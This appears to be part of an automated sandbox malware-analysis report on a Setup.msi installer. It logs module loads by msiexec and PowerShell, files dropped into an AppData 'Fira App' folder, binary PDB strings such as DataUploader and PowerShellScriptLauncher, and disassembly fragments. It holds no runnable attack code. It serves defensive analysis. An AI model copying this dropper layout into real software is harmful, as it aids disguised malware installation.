Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: obs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: avcodec-60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: avutil-58.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: avformat-60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: w32-pthreads.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: avutil-58.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: swresample-4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Section loaded: sspicli.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{337A659D-79FE-4CED-9D18-362BBF6F3DBC}

Jump to behavior

Source: Setup.msi

Static file information: File size 60684288 > 1048576

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb source: createdump.exe, 00000008.00000000.2286400593.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: ucrtbase.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbk source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source:	Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdbj source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: obs-ffmpeg-mux.exe, 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source:	Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.1.dr
Source:	Binary string: obs-ffmpeg-mux.pdb source: obs-ffmpeg-mux.exe, 0000000B.00000000.2288252908.00007FF649AA5000.00000002.00000001.01000000.00000007.sdmp, obs-ffmpeg-mux.exe, 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb;;;GCTL source: createdump.exe, 00000008.00000000.2286400593.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: Microsoft.Web.WebView2.Core.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source:	Binary string: w32-pthreads.pdb source: obs-ffmpeg-mux.exe, 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.msi, MSI2E72.tmp.1.dr, MSI2EB2.tmp.1.dr, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Setup.msi, 5924ec.msi.1.dr

Source: api-ms-win-core-synch-l1-2-0.dll.1.dr

Static PE information: 0x8A188CB0 [Tue Jun 2 13:31:28 2043 UTC]

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 11_2_00007FF8A7BFED32 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,

11_2_00007FF8A7BFED32

Source: vcruntime140.dll.1.dr	Static PE information: section name: _RDATA
Source: BCUninstaller.exe.1.dr	Static PE information: section name: _RDATA
Source: createdump.exe.1.dr	Static PE information: section name: _RDATA
Source: UnRar.exe.1.dr	Static PE information: section name: _RDATA
Source: avformat-60.dll.1.dr	Static PE information: section name: .xdata
Source: avutil-58.dll.1.dr	Static PE information: section name: .xdata
Source: swresample-4.dll.1.dr	Static PE information: section name: .xdata
Source: swscale-7.dll.1.dr	Static PE information: section name: .xdata
Source: zlib.dll.1.dr	Static PE information: section name: .xdata
Source: avcodec-60.dll.1.dr	Static PE information: section name: .rodata
Source: avcodec-60.dll.1.dr	Static PE information: section name: .xdata
Source: MSI56B3.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2E04.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2E72.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2EB2.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2EF1.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2F50.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2F90.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2FCF.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI4EE1.tmp.1.dr	Static PE information: section name: .fptable

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04D0AEB2 pushad ; ret	4_2_04D0AEC3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04D0B76A push eax; ret	4_2_04D0B8A3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04D0BDA2 push esp; ret	4_2_04D0BDB3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04D0B86A push eax; ret	4_2_04D0B8A3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_078804D0 pushad ; ret	4_2_078804E9

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2FCF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avformat-60.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\msvcp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\UnRar.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2F90.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\zlib.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4EE1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avcodec-60.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
